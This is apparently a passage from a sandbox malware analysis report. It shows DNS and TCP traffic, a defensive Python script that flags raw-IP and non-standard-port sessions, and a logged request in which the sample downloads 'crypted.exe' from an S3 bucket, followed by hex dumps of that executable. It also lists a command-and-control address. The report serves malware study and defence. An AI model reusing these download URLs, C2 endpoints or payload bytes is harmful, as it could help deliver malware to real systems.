Sep 25, 2021 10:17:35.147265911 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:44.054528952 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:44.076057911 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:18:04.063167095 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:18:04.088907957 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:18:19.182080030 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:18:19.220206976 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:18:20.554737091 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:18:20.575695992 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 25, 2021 10:17:09.548855066 CEST | 192.168.2.6 | 8.8.8.8 | 0x195d | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 25, 2021 10:17:09.582917929 CEST | 192.168.2.6 | 8.8.8.8 | 0x486a | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 25, 2021 10:17:18.551632881 CEST | 192.168.2.6 | 8.8.8.8 | 0x5c39 | Standard query (0) | cli-4576347563476534786.s3.us-east-2.amazonaws.com | A (IP address) | IN (0x0001)
Sep 25, 2021 10:17:18.582453966 CEST | 192.168.2.6 | 8.8.8.8 | 0x20c2 | Standard query (0) | cli-4576347563476534786.s3.us-east-2.amazonaws.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 25, 2021 10:17:09.569423914 CEST | 8.8.8.8 | 192.168.2.6 | 0x195d | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 25, 2021 10:17:09.602706909 CEST | 8.8.8.8 | 192.168.2.6 | 0x486a | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 25, 2021 10:17:18.573545933 CEST | 8.8.8.8 | 192.168.2.6 | 0x5c39 | No error (0) | cli-4576347563476534786.s3.us-east-2.amazonaws.com | s3-r-w.us-east-2.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 25, 2021 10:17:18.573545933 CEST | 8.8.8.8 | 192.168.2.6 | 0x5c39 | No error (0) | s3-r-w.us-east-2.amazonaws.com | - | 52.219.104.152 | A (IP address) | IN (0x0001)
Sep 25, 2021 10:17:18.602396011 CEST | 8.8.8.8 | 192.168.2.6 | 0x20c2 | No error (0) | cli-4576347563476534786.s3.us-east-2.amazonaws.com | s3-r-w.us-east-2.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 25, 2021 10:17:18.602396011 CEST | 8.8.8.8 | 192.168.2.6 | 0x20c2 | No error (0) | s3-r-w.us-east-2.amazonaws.com | - | 52.219.104.152 | A (IP address) | IN (0x0001)
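Two things in the tables above are worth pulling out automatically when triaging a capture like this: which remote endpoints the sample talked to without ever resolving a name for them (the only DNS queries in the capture are for api.ip.sb and the S3 bucket host, so 80.87.192.249 was contacted by raw IP), and which sessions run on a port that is not ordinary web traffic (the TCP stream to 80.87.192.249 uses port 16640). The script below is an added example written for this page, not part of the Joe Sandbox output. It groups TCP packets into sessions, walks the DNS CNAME/A chain backwards so an IP maps to the name the sample actually queried, and flags both conditions. The embedded rows are transcribed from the TCP Packets and DNS Answers tables (a subset, in the column order of those tables); LOCAL_HOST being the analysis VM and EXPECTED_PORTS being {80, 443} are assumptions.

```python
"""Session/DNS correlation over the Joe Sandbox network tables.

Added example for this report. TCP_ROWS and DNS_ROWS are transcribed from the
TCP Packets and DNS Answers tables (subset). LOCAL_HOST is assumed to be the
analysis VM; EXPECTED_PORTS is an assumed list of ordinary web ports.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
import re

LOCAL_HOST = "192.168.2.6"      # assumption: the sandbox VM
EXPECTED_PORTS = {80, 443}      # assumption: ports not worth flagging on their own

# timestamp | src port | dst port | src IP | dst IP  (transcribed subset)
TCP_ROWS = """\
Sep 25, 2021 10:17:19.679579020 CEST|49741|443|192.168.2.6|52.219.104.152
Sep 25, 2021 10:17:19.679724932 CEST|443|49741|52.219.104.152|192.168.2.6
Sep 25, 2021 10:17:19.839713097 CEST|49741|443|192.168.2.6|52.219.104.152
Sep 25, 2021 10:17:20.840604067 CEST|16640|49737|80.87.192.249|192.168.2.6
Sep 25, 2021 10:17:20.841377974 CEST|49737|16640|192.168.2.6|80.87.192.249
Sep 25, 2021 10:17:22.614346981 CEST|49737|16640|192.168.2.6|80.87.192.249
"""

# name | cname | address | type  (transcribed from DNS Answers)
DNS_ROWS = """\
api.ip.sb|api.ip.sb.cdn.cloudflare.net||CNAME
cli-4576347563476534786.s3.us-east-2.amazonaws.com|s3-r-w.us-east-2.amazonaws.com||CNAME
s3-r-w.us-east-2.amazonaws.com||52.219.104.152|A
"""

# Joe Sandbox prints nanoseconds; strptime only takes microseconds, so drop the rest.
_TS = re.compile(r"^(.+?\.\d{6})\d*\s+\w+$")


def parse_ts(text: str) -> datetime:
    m = _TS.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


@dataclass
class Session:
    remote_ip: str
    remote_port: int
    local_port: int
    first: datetime
    last: datetime
    packets: int = 0
    to_remote: int = 0
    from_remote: int = 0


def parse_tcp(rows: str) -> list:
    out = []
    for line in rows.strip().splitlines():
        ts, sp, dp, sip, dip = line.split("|")
        out.append((parse_ts(ts), int(sp), int(dp), sip, dip))
    return out


def build_sessions(packets, local: str = LOCAL_HOST) -> list:
    """Key every packet on (remote IP, remote port, local port), whichever way it flows."""
    sessions = {}
    for ts, sp, dp, sip, dip in packets:
        if sip == local:
            key, outbound = (dip, dp, sp), True
        elif dip == local:
            key, outbound = (sip, sp, dp), False
        else:
            continue  # neither end is the VM; not our traffic
        s = sessions.get(key)
        if s is None:
            s = sessions[key] = Session(key[0], key[1], key[2], ts, ts)
        s.packets += 1
        s.first, s.last = min(s.first, ts), max(s.last, ts)
        if outbound:
            s.to_remote += 1
        else:
            s.from_remote += 1
    return list(sessions.values())


def dns_reverse_map(rows: str) -> dict:
    """IP -> every name that leads to it, following CNAME aliases back to the queried name."""
    cname, direct = {}, defaultdict(set)
    for line in rows.strip().splitlines():
        name, cn, addr, rtype = line.split("|")
        if rtype == "CNAME":
            cname[name] = cn
        elif rtype == "A":
            direct[addr].add(name)
    rev = defaultdict(set)
    for ip, names in direct.items():
        rev[ip] |= names
        changed = True
        while changed:  # alias -> canonical may chain several levels deep
            changed = False
            for alias, canon in cname.items():
                if canon in rev[ip] and alias not in rev[ip]:
                    rev[ip].add(alias)
                    changed = True
    return rev


def triage(tcp_rows: str = TCP_ROWS, dns_rows: str = DNS_ROWS) -> list:
    rev = dns_reverse_map(dns_rows)
    findings = []
    for s in build_sessions(parse_tcp(tcp_rows)):
        names = sorted(rev.get(s.remote_ip, ()))
        flags = []
        if not names:
            flags.append("no-dns-resolution")   # reached by hard-coded IP
        if s.remote_port not in EXPECTED_PORTS:
            flags.append("non-standard-port")
        findings.append({
            "remote": f"{s.remote_ip}:{s.remote_port}",
            "names": names,
            "packets": s.packets,
            "duration_s": round((s.last - s.first).total_seconds(), 3),
            "flags": flags,
        })
    return sorted(findings, key=lambda f: f["remote"])


if __name__ == "__main__":
    for f in triage():
        print(f)
```

Run against the full tables the same code gives a one-line summary per session; the S3 session resolves back to the bucket host the sample queried, while the 80.87.192.249:16640 session carries both flags.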

HTTP Request Dependency Graph

• cli-4576347563476534786.s3.us-east-2.amazonaws.com

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49741 | 52.219.104.152 | 443 | C:\Users\user\Desktop\eYvT1lg5Dy.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-25 08:17:19 UTC | 0 | OUT | GET /crypted.exe HTTP/1.1
Host: cli-4576347563476534786.s3.us-east-2.amazonaws.com
Connection: Keep-Alive
2021-09-25 08:17:19 UTC | 0 | IN | HTTP/1.1 200 OK
x-amz-id-2: nE4T6NS6ItDtwRt9YZ+RrsN63nzysp1hzYR/IC91b3KtSjWvhPJbCa9nHunQUayIrsCJu6PigEY=
x-amz-request-id: G3WXJJ2R56XYBKBD
Date: Sat, 25 Sep 2021 08:17:20 GMT
Last-Modified: Fri, 24 Sep 2021 22:06:55 GMT
ETag: "d508b954a785bdb77fdeffcd4c56f8e5"
x-amz-version-id: h8r.j4SDmc.A_8yNCUeqwlqq0.xjCJlX
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 293376
Connection: close
2021-09-25 08:17:19 UTC | 0 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 22 be 17 de 66 df 79 8d 66 df 79 8d 66 df 79 8d 09 a9 d2 8d 4d df 79 8d 09 a9 e7 8d 76 df 79 8d 09 a9 d3 8d 00 df 79 8d 6f a7 ea 8d 65 df 79 8d 66 df 78 8d 1a df 79 8d 09 a9 d6 8d 67 df 79 8d 09 a9 e3 8d 67 df 79 8d 09 a9 e4 8d 67 df 79 8d 52 69 63 68 66 df 79 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 14 0c 9b 5f 00 00 00 00 00 00 00 00 e0 00 02
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$"fyfyfyMyvyyoeyfxygygygyRichfyPEL_
2021-09-25 08:17:19 UTC | 16 | IN | Data Raw: 48 0c 83 c9 20 8b 55 f8 89 4a 0c 83 c8 ff e9 c5 01 00 00 8b 45 f8 8b 48 0c 83 c9 02 8b 55 f8 89 4a 0c 8b 45 f8 8b 48 0c 83 e1 ef 8b 55 f8 89 4a 0c 8b 45 f8 c7 40 04 00 00 00 00 c7 45 fc 00 00 00 00 8b 4d fc 89 4d f4 8b 55 f8 8b 42 0c 25 0c 01 00 00 75 36 e8 c6 2c 00 00 83 c0 20 39 45 f8 74 0d e8 b9 2c 00 00 83 c0 40 39 45 f8 75 10 8b 4d f0 51 e8 d8 90 00 00 83 c4 04 85 c0 75 0c 8b 55 f8 52 e8 f8 8f 00 00 83 c4 04 8b 45 f8 8b 48 0c 81 e1 08 01 00 00 0f 84 f9 00 00 00 8b 55 f8 8b 45 f8 8b 0a 2b 48 08 79 21 68 d8 c4 41 00 6a 00 68 a0 00 00 00 68 58 c5 41 00 6a 02 e8 0e 03 00 00 83 c4 14 83 f8 01 75 01 cc 8b 45 f8 8b 4d f8 8b 10 2b 51 08 89 55 fc 8b 45 f8 8b 48 08 83 c1 01 8b 55 f8 89 0a 8b 45 f8 8b 48 18 83 e9 01 8b 55 f8 89 4a 04 83 7d fc 00 7e 1c 8b 45 fc
                                                                                                                                                                                        Data Ascii: H UJEHUJEHUJE@EMMUB%u6, 9Et,@9EuMQuUREHUE+Hy!hAjhhXAjuEM+QUEHUEHUJ}~E
                                                                                                                                                                                        2021-09-25 08:17:19 UTC17INData Raw: 00 00 00 8b e5 5d c3 cc cc cc cc cc cc 8b ff 55 8b ec 6a 01 68 17 04 00 c0 6a 02 e8 1d 00 00 00 83 c4 0c 68 17 04 00 c0 ff 15 04 b1 41 00 50 ff 15 00 b1 41 00 5d c3 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 38 03 00 00 a1 88 41 42 00 33 c5 89 45 f0 83 7d 08 ff 74 0c 8b 45 08 50 e8 3c 58 00 00 83 c4 04 c7 85 c8 fc ff ff 00 00 00 00 6a 4c 6a 00 8d 8d cc fc ff ff 51 e8 ef 17 00 00 83 c4 0c 8d 95 c8 fc ff ff 89 55 f8 8d 85 20 fd ff ff 89 45 fc c7 45 f4 00 00 00 00 c7 85 1c fd ff ff 00 00 00 00 89 85 d0 fd ff ff 89 8d cc fd ff ff 89 95 c8 fd ff ff 89 9d c4 fd ff ff 89 b5 c0 fd ff ff 89 bd bc fd ff ff 66 8c 95 e8 fd ff ff 66 8c 8d dc fd ff ff 66 8c 9d b8 fd ff ff 66 8c 85 b4 fd ff ff 66 8c a5 b0 fd ff ff 66 8c ad ac fd ff ff 9c 8f 85 e0 fd ff ff c7 85 20 fd ff ff
                                                                                                                                                                                        Data Ascii: ]UjhjhAPA]U8AB3E}tEP<XjLjQU EEffffff
                                                                                                                                                                                        2021-09-25 08:17:19 UTC33INData Raw: 8b ec 83 ec 14 8b 45 18 c7 00 00 00 00 00 8b 4d 14 c7 01 01 00 00 00 8b 55 08 89 55 fc 83 7d 0c 00 74 11 8b 45 0c 8b 4d 10 89 08 8b 55 0c 83 c2 04 89 55 0c c7 45 f8 00 00 00 00 8b 45 fc 0f be 08 83 f9 22 75 1f 33 d2 83 7d f8 00 0f 94 c2 89 55 f8 8b 45 fc 8a 08 88 4d f3 8b 55 fc 83 c2 01 89 55 fc eb 77 8b 45 18 8b 08 83 c1 01 8b 55 18 89 0a 83 7d 10 00 74 13 8b 45 10 8b 4d fc 8a 11 88 10 8b 45 10 83 c0 01 89 45 10 8b 4d fc 8a 11 88 55 f3 8b 45 fc 83 c0 01 89 45 fc 0f b6 4d f3 51 e8 47 89 00 00 83 c4 04 85 c0 74 2f 8b 55 18 8b 02 83 c0 01 8b 4d 18 89 01 83 7d 10 00 74 13 8b 55 10 8b 45 fc 8a 08 88 0a 8b 55 10 83 c2 01 89 55 10 8b 45 fc 83 c0 01 89 45 fc 0f b6 4d f3 85 c9 74 20 83 7d f8 00 0f 85 4d ff ff ff 0f b6 55 f3 83 fa 20 74 0d 0f b6 45 f3 83 f8 09 0f
                                                                                                                                                                                        Data Ascii: EMUU}tEMUUEE"u3}UEMUUwEU}tEMEEMUEEMQGt/UM}tUEUUEEMt }MU tE
                                                                                                                                                                                        2021-09-25 08:17:19 UTC34INData Raw: 55 f8 52 ff 15 40 b1 41 00 33 c0 eb 44 6a 00 6a 00 8b 45 fc 50 8b 4d ec 51 8b 55 f0 52 8b 45 f8 50 6a 00 6a 00 ff 15 44 b1 41 00 85 c0 75 15 6a 02 8b 4d ec 51 e8 b3 98 ff ff 83 c4 08 c7 45 ec 00 00 00 00 8b 55 f8 52 ff 15 40 b1 41 00 8b 45 ec 8b e5 5d c3 cc cc cc cc cc cc cc cc 8b ff 56 be d4 24 42 00 8b c6 3d d4 24 42 00 73 13 8b 06 85 c0 74 02 ff d0 83 c6 04 81 fe d4 24 42 00 72 ed 5e c3 cc cc cc cc cc cc cc cc cc cc 8b ff 56 be dc 24 42 00 8b c6 3d dc 24 42 00 73 13 8b 06 85 c0 74 02 ff d0 83 c6 04 81 fe dc 24 42 00 72 ed 5e c3 cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a 00 ff 15 d8 b0 41 00 5d c3 cc 8b ff 55 8b ec ff 15 4c b1 41 00 5d c2 04 00 cc 8b ff 55 8b ec 51 a1 64 44 42 00 50 ff 15 0c b0 41 00 89 45 fc 83 7d fc 00 75 20 8b 0d ec 49 43 00 51
                                                                                                                                                                                        Data Ascii: UR@A3DjjEPMQUREPjjDAujMQEUR@AE]V$B=$Bst$Br^V$B=$Bst$Br^UjA]ULA]UQdDBPAE}u ICQ
                                                                                                                                                                                        2021-09-25 08:17:19 UTC49INData Raw: 01 74 19 8b 4d 10 51 8b 55 0c 52 8b 45 08 50 e8 86 00 00 00 83 c4 0c 89 45 e4 eb 3f e8 d9 71 ff ff c7 00 09 00 00 00 e8 fe 71 ff ff c7 00 00 00 00 00 c7 45 e4 ff ff ff ff 33 c9 75 1e 68 18 ea 41 00 6a 00 6a 4f 68 c8 eb 41 00 6a 02 e8 d8 7e ff ff 83 c4 14 83 f8 01 75 01 cc c7 45 fc fe ff ff ff e8 02 00 00 00 eb 0d 8b 45 08 50 e8 88 78 00 00 83 c4 04 c3 8b 45 e4 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec b8 90 3c 00 00 e8 21 25 00 00 a1 88 41 42 00 33 c5 89 45 bc c7 45 e8 00 00 00 00 c7 45 e4 00 00 00 00 c7 45 fc 00 00 00 00 8b 45 fc 89 45 ec 83 7d 10 00 75 07 33 c0 e9 f1 0a 00 00 33 c9 83 7d 0c 00 0f 95 c1 89 4d e0 83 7d e0 00 75 1e 68 a0 ec 41 00 6a 00 6a 6d 68 c8 eb 41 00 6a 02 e8 28
                                                                                                                                                                                        Data Ascii: tMQUREPE?qqE3uhAjjOhAj~uEEPxEMdY_^[]U<!%AB3EEEEEE}u33}M}uhAjjmhAj(
                                                                                                                                                                                        2021-09-25 08:17:19 UTC51INData Raw: 00 8b 55 ec 83 c2 01 89 55 ec 8b 45 fc 83 c0 01 89 45 fc eb 0e ff 15 74 b0 41 00 89 45 f4 e9 97 00 00 00 e9 8d 00 00 00 0f be 4d fb 83 f9 01 74 09 0f be 55 fb 83 fa 02 75 7b 0f b7 45 c0 50 e8 49 73 00 00 83 c4 04 0f b7 c8 0f b7 55 c0 3b ca 75 0b 8b 45 fc 83 c0 02 89 45 fc eb 0b ff 15 74 b0 41 00 89 45 f4 eb 52 83 7d b0 00 74 47 c7 45 c8 01 00 00 00 b9 0d 00 00 00 66 89 4d c0 0f b7 55 c0 52 e8 05 73 00 00 83 c4 04 0f b7 c0 0f b7 4d c0 3b c1 75 14 8b 55 fc 83 c2 01 89 55 fc 8b 45 ec 83 c0 01 89 45 ec eb 0b ff 15 74 b0 41 00 89 45 f4 eb 05 e9 74 fc ff ff e9 dc 04 00 00 8b 4d 08 c1 f9 05 8b 55 08 83 e2 1f c1 e2 06 8b 04 8d 40 7b b7 02 0f be 4c 10 04 81 e1 80 00 00 00 0f 84 6b 04 00 00 c7 45 f4 00 00 00 00 0f be 55 fb 85 d2 0f 85 3f 01 00 00 c7 85 ac eb ff ff
                                                                                                                                                                                        Data Ascii: UUEEtAEMtUu{EPIsU;uEEtAER}tGEfMURsM;uUUEEtAEtMU@{LkEU?
                                                                                                                                                                                        2021-09-25 08:17:19 UTC67INData Raw: 45 f4 8b 48 08 89 0a 8b 55 f4 c7 42 04 00 00 00 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc 8b ff 55 8b ec 6a 01 e8 14 00 00 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 88 28 42 00 68 00 49 40 00 64 a1 00 00 00 00 50 83 c4 ec 53 56 57 a1 88 41 42 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 c7 45 e4 00 00 00 00 c7 45 dc 00 00 00 00 6a 01 e8 49 8a ff ff 83 c4 04 c7 45 fc 00 00 00 00 c7 45 e0 00 00 00 00 eb 09 8b 45 e0 83 c0 01 89 45 e0 8b 4d e0 3b 0d 60 8c b7 02 0f 8d f4 00 00 00 8b 55 e0 a1 40 7c b7 02 83 3c 90 00 0f 84 dd 00 00 00 8b 4d e0 8b 15 40 7c b7 02 8b 04 8a 8b 48 0c 81 e1 83 00 00 00 0f 84 c2 00 00 00 8b 55 e0 a1 40 7c b7 02 8b 0c 90 51 8b 55 e0 52 e8 dc 63 ff ff 83 c4 08 c7 45 fc 01 00 00 00 8b 45 e0 8b
                                                                                                                                                                                        Data Ascii: EHUBE]Uj]Ujh(BhI@dPSVWAB1E3PEdEEjIEEEEM;`U@|<M@|HU@|QURcEE
                                                                                                                                                                                        2021-09-25 08:17:19 UTC68INData Raw: 00 6a 00 6a 13 68 a8 fb 41 00 68 c4 fe 41 00 68 68 fb 41 00 e8 94 33 ff ff 83 c4 14 b8 16 00 00 00 e9 87 01 00 00 8b 4d 08 89 4d fc 8b 55 0c 89 55 f8 8b 45 fc 8b 4d 10 8a 11 88 10 8b 45 fc 0f be 08 8b 55 fc 83 c2 01 89 55 fc 8b 45 10 83 c0 01 89 45 10 85 c9 74 0d 8b 4d f8 83 e9 01 89 4d f8 74 02 eb cd 83 7d f8 00 0f 85 cf 00 00 00 8b 55 08 c6 02 00 83 7d 0c ff 74 49 81 7d 0c ff ff ff 7f 74 40 83 7d 0c 01 76 3a 8b 45 0c 83 e8 01 39 05 08 40 42 00 73 0b 8b 0d 08 40 42 00 89 4d e0 eb 09 8b 55 0c 83 ea 01 89 55 e0 8b 45 e0 50 68 fe 00 00 00 8b 4d 08 83 c1 01 51 e8 ac 4b ff ff 83 c4 0c ba 40 fb 41 00 85 d2 74 0d 33 c0 74 09 c7 45 dc 01 00 00 00 eb 07 c7 45 dc 00 00 00 00 8b 4d dc 89 4d ec 83 7d ec 00 75 1e 68 04 fb 41 00 6a 00 6a 1e 68 a8 fb 41 00 6a 02 e8 8b
                                                                                                                                                                                        Data Ascii: jjhAhAhhA3MMUUEMEUUEEtMMt}U}tI}t@}v:E9@Bs@BMUUEPhMQK@At3tEEMM}uhAjjhAj
                                                                                                                                                                                        2021-09-25 08:17:19 UTC84INData Raw: 10 52 8b 45 0c 50 e8 62 03 00 00 83 c4 08 89 45 10 8d 4d f0 51 6a 00 8b 55 10 52 8b 45 08 50 8b 4d 10 51 8b 55 0c 52 6a 00 8d 4d e0 e8 cc e1 fe ff 8b 00 8b 48 04 51 ff 15 44 b1 41 00 89 45 fc 83 7d fc 00 74 33 83 7d f0 00 75 2d 8b 55 08 03 55 fc 0f be 42 ff 85 c0 75 09 8b 4d fc 83 e9 01 89 4d fc 8b 55 fc 89 55 b8 8d 4d e0 e8 5c e1 fe ff 8b 45 b8 e9 e3 02 00 00 e8 df e7 fe ff c7 00 2a 00 00 00 c7 45 b4 ff ff ff ff 8d 4d e0 e8 3a e1 fe ff 8b 45 b4 e9 c1 02 00 00 e9 c3 01 00 00 8d 45 f0 50 6a 00 8b 4d 10 51 8b 55 08 52 6a ff 8b 45 0c 50 6a 00 8d 4d e0 e8 3f e1 fe ff 8b 08 8b 51 04 52 ff 15 44 b1 41 00 89 45 fc 83 7d fc 00 74 1f 83 7d f0 00 75 19 8b 45 fc 83 e8 01 89 45 b0 8d 4d e0 e8 e3 e0 fe ff 8b 45 b0 e9 6a 02 00 00 83 7d f0 00 75 0b ff 15 74 b0 41 00 83
                                                                                                                                                                                        Data Ascii: REPbEMQjUREPMQURjMHQDAE}t3}u-UUBuMMUUM\E*EM:EEPjMQURjEPjM?QRDAE}t}uEEMEj}utA
                                                                                                                                                                                        2021-09-25 08:17:19 UTC85INData Raw: 01 00 00 00 8b 45 e4 89 45 f0 83 7d f0 00 75 21 68 90 10 42 00 6a 00 68 40 01 00 00 68 c8 0f 42 00 6a 02 e8 65 f1 fe ff 83 c4 14 83 f8 01 75 01 cc 83 7d f0 00 75 33 e8 21 e4 fe ff c7 00 16 00 00 00 6a 00 68 40 01 00 00 68 c8 0f 42 00 68 74 10 42 00 68 90 10 42 00 e8 50 ef fe ff 83 c4 14 b8 16 00 00 00 e9 85 02 00 00 83 7d 0c 00 74 55 8b 55 0c c6 02 00 83 7d 10 ff 74 49 81 7d 10 ff ff ff 7f 74 40 83 7d 10 01 76 3a 8b 45 10 83 e8 01 39 05 08 40 42 00 73 0b 8b 0d 08 40 42 00 89 4d e0 eb 09 8b 55 10 83 ea 01 89 55 e0 8b 45 e0 50 68 fe 00 00 00 8b 4d 0c 83 c1 01 51 e8 ab 07 ff ff 83 c4 0c 83 7d 08 00 74 09 8b 55 08 c7 02 00 00 00 00 8b 45 18 3b 45 10 76 08 8b 4d 10 89 4d dc eb 06 8b 55 18 89 55 dc 8b 45 dc 89 45 f8 b9 ff ff ff 7f 3b 4d f8 1b d2 83 c2 01 89 55
                                                                                                                                                                                        Data Ascii: EE}u!hBjh@hBjeu}u3!jh@hBhtBhBP}tUU}tI}t@}v:E9@Bs@BMUUEPhMQ}tUE;EvMMUUEE;MU
                                                                                                                                                                                        2021-09-25 08:17:19 UTC101INData Raw: 02 05 01 00 00 75 31 6a 00 ff 15 64 b0 41 00 6a 00 6a 00 ff 15 98 b0 41 00 68 f4 1f 42 00 68 30 20 42 00 68 40 20 42 00 ff 15 b4 b0 41 00 6a 00 6a 00 ff 15 94 b0 41 00 eb a6 c7 85 68 ef ff ff 00 00 00 00 eb 0f 8b 95 68 ef ff ff 83 c2 01 89 95 68 ef ff ff 81 bd 68 ef ff ff bc 5f 0e 00 7d 7e 81 3d 00 7b b7 02 e2 09 00 00 75 2d 6a 00 6a 00 68 78 20 42 00 68 20 21 42 00 6a 00 ff 15 c0 b0 41 00 6a 00 ff 15 20 b0 41 00 8d 85 28 ee ff ff 50 6a 00 ff 15 a4 b0 41 00 81 bd 68 ef ff ff 22 3b 00 00 75 0c 8b 0d 44 48 43 00 89 0d 04 7b b7 02 81 3d 00 7b b7 02 b5 0d 00 00 75 1c 6a 00 6a 00 6a 00 6a 00 ff 15 40 b0 41 00 ff 15 38 b0 41 00 6a 00 ff 15 c8 b0 41 00 e9 67 ff ff ff c7 85 24 ee ff ff 00 00 00 00 eb 0f 8b 95 24 ee ff ff 83 c2 01 89 95 24 ee ff ff 8b 85 24 ee ff
                                                                                                                                                                                        Data Ascii: u1jdAjjAhBh0 Bh@ BAjjAhhhh_}~={u-jjhx Bh !BjAj A(PjAh";uDHC{={ujjjj@A8AjAg$$$$
                                                                                                                                                                                        2021-09-25 08:17:19 UTC102INData Raw: 00 4e 2e 02 00 60 2e 02 00 76 2e 02 00 8c 2e 02 00 9c 2e 02 00 a8 2e 02 00 b8 2e 02 00 d0 2e 02 00 e2 2e 02 00 f4 2e 02 00 04 2f 02 00 14 2f 02 00 30 2f 02 00 40 2f 02 00 58 2f 02 00 6a 2f 02 00 7e 2f 02 00 96 2f 02 00 a6 2f 02 00 b4 2f 02 00 d2 2f 02 00 ec 2f 02 00 f8 2f 02 00 08 30 02 00 16 30 02 00 26 30 02 00 40 30 02 00 54 30 02 00 74 30 02 00 8a 30 02 00 9e 30 02 00 aa 30 02 00 c4 30 02 00 d8 30 02 00 e8 30 02 00 f6 30 02 00 0e 31 02 00 36 31 02 00 46 31 02 00 56 31 02 00 68 31 02 00 7e 31 02 00 90 31 02 00 a0 31 02 00 b0 31 02 00 c8 31 02 00 dc 31 02 00 ea 31 02 00 fe 31 02 00 12 32 02 00 2e 32 02 00 4c 32 02 00 60 32 02 00 78 32 02 00 8a 32 02 00 b2 32 02 00 c0 32 02 00 d8 32 02 00 f2 32 02 00 02 33 02 00 18 33 02 00 2e 33 02 00 48 33 02 00 5e 33
                                                                                                                                                                                        Data Ascii: N.`.v........//0/@/X/j/~///////00&0@0T0t00000000161F1V1h1~111111112.2L2`2x22222233.3H3^3
                                                                                                                                                                                        2021-09-25 08:17:19 UTC118INData Raw: 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 29 00 00 00 25 73 28 25 64 29 20 3a 20 25 73 00 00 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5c 00 6e 00 22 00 29 00 00 00 0d 00 00 00 00 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5c 00 72 00 22 00 29 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00
                                                                                                                                                                                        Data Ascii: zLineMessage)%s(%d) : %sstrcat_s(szLineMessage, 4096, "\n")strcat_s(szLineMessage, 4096, "\r")strcat_s(szLineMessage, 4096,
                                                                                                                                                                                        2021-09-25 08:17:19 UTC119INData Raw: 63 74 65 72 73 20 69 6e 20 53 74 72 69 6e 67 00 00 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 32 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5f 00 43 00 72 00 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 3a 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 63 00 68 00 61 00 72 00 61 00 63 00 74 00 65 00 72 00 73 00 20 00 69 00 6e 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 22 00 